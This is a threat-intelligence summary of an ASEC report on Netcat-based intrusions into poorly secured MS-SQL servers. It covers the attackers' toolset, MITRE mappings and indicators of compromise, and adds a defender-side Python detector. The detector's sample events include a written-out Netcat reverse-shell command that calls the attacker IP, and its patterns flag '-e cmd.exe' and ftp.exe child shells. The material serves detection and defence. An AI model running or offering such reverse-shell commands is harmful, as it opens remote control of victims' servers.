ASEC reports Netcat-laced campaigns targeting poorly managed MS-SQL servers, leveraging multiple tools (including Cobalt Strike, RasmanPotato, Stowaway, and SharpDecryptPwd) to gain control, escalate privileges, and move laterally. The operation employs LOLBins and FTP-based command execution to evade simple detections while targeting exposed databases. #Netcat #CobaltStrike
Key points
- Netcat is being distributed to attack poorly managed MS-SQL servers.
- Netcat is described as a remote shell option (bind vs reverse), with reverse shell favored for evading NAT/firewalls.
- Attackers deploy a toolbox including CobaltStrike, RasmanPotato, SharpDecryptPwd, and Stowaway, often staged in the D:\DB directory.
- Early Cobalt Strike attempts were blocked by the V3 product; later variants used an HTTPS Stager that downloads the Beacon backdoor from the C&C server and executes it in memory.
- RasmanPotato is used for privilege escalation by abusing account tokens and RasMan service.
- Stowaway provides proxy capability to pivot inside the network and includes anti-detection techniques (NTDLL decoding and ETW patching).
- Netcat likely leveraged LOLBins and FTP to execute commands via a remote shell, complicating behavior-based detection.
MITRE Techniques
- [T1110] Brute Force – ‘Poorly managed MS-SQL servers typically refer to those that are exposed to external connections and have simple account credentials, rendering them vulnerable to brute force or dictionary attacks.’
- [T1059.003] Windows Command Shell – ‘Remote shell… Command Prompt’ and use of cmd.exe to execute commands in Windows environments.
- [T1105] Ingress Tool Transfer – ‘HTTPS Stager that downloads the backdoor, Beacon, from the C&C server before executing it in the memory.’
- [T1090] Proxy – ‘Stowaway… proxy tool’ used to access internal network environments.
- [T1548] Abuse Elevation: Token Impersonation – ‘RasmanPotato… uses the RasMan service for privilege escalation’ and ‘exploit[ing] privileges from account tokens that belong to running processes.’
- [T1003] Credential Dumping – ‘SharpDecryptPwd is a command line tool that collects and displays account credentials.’
- [T1027] Obfuscated/Compressed Files and Information – ‘the packer decodes the NTDLL code section loaded in memory to the original NTDLL code… remove the hook installed by security products to evade detection.’
- [T1562] Impair Defenses – ‘patches the EtwEventWrite() function to be terminated immediately upon being called to prevent events carried out by the malware from being sent to Windows.’
- [T1059.003] Windows Command Shell – ‘Netcat executed with -e cmd.exe (reverse shell) and FTP-based command execution via the “!” feature’ (note: Windows Command Shell usage described again for Netcat/FTP context).
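As an added defender-side example (not code from the ASEC report), the Python below applies the behaviours listed in the key points and MITRE mappings above to constructed process-creation events in a Sysmon-like shape: a shell spawned by the MS-SQL service process, a Netcat-style `-e cmd.exe` argument, a child process of ftp.exe (the `!` command-execution feature), and file names from the report's IoC list. The event field names, the sqlservr.exe parent heuristic and the sample events are assumptions; the IP and port in the sample come from the IoC list.

```python
import re
from typing import Dict, List

# Constructed process-creation events in a Sysmon-like shape (assumed field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "CommandLine": 'cmd.exe /c "mkdir D:\\DB"'},
    {"Image": r"D:\DB\nc64m.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nc64m.exe 107.175.111.199 8081 -e cmd.exe"},   # reverse shell
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\ftp.exe",                 # ftp.exe "!" feature
     "CommandLine": 'cmd.exe /c "whoami"'},
    {"Image": r"C:\Windows\System32\notepad.exe",                   # benign control
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

# File names listed as IoCs in the report; the weakest signal, easily renamed.
IOC_FILENAMES = {"artifact.exe", "git.exe", "mimih3.exe", "nc64m.exe",
                 "rasman.exe", "sharpdecryptpwd.exe", "info.exe", "agent.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# Netcat's -e option followed by a shell: covers both bind and reverse shell usage.
NETCAT_EXEC = re.compile(r"(^|\s)-e\s+(cmd|powershell)(\.exe)?(\s|$)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons this process-creation event matches the campaign's behaviours."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmdline = ev.get("CommandLine", "")
    reasons = []
    if image in SHELLS and parent == "sqlservr.exe":   # assumed MS-SQL service image name
        reasons.append("shell spawned by MS-SQL service process")
    if NETCAT_EXEC.search(cmdline):
        reasons.append("netcat-style '-e <shell>' argument (bind/reverse shell)")
    if parent == "ftp.exe":
        reasons.append("child process of ftp.exe (FTP '!' command execution)")
    if image in IOC_FILENAMES:
        reasons.append(f"file name from report IoC list: {image}")
    return reasons


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to its reasons, keeping only events that triggered something."""
    flagged = {i: flag_event(e) for i, e in enumerate(events)}
    return {i: r for i, r in flagged.items() if r}
```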
Indicators of Compromise
- [MD5] context – 7cc986338d60af5f2b0f1a17d5ed0542, 3cdc614b55c9426a73fcfc194f3c13bc, and 7 more hashes
- [IP Address] context – 107.175.111.199:52443, 107.175.111.199:8081
- [Domain] context – ccbsec.ccb.fyi
- [File Name] context – artifact.exe, git.exe, mimih3.exe, nc64m.exe, rasman.exe, SharpDecryptPwd.exe, info.exe, agent.exe
Read more: https://asec.ahnlab.com/en/49249/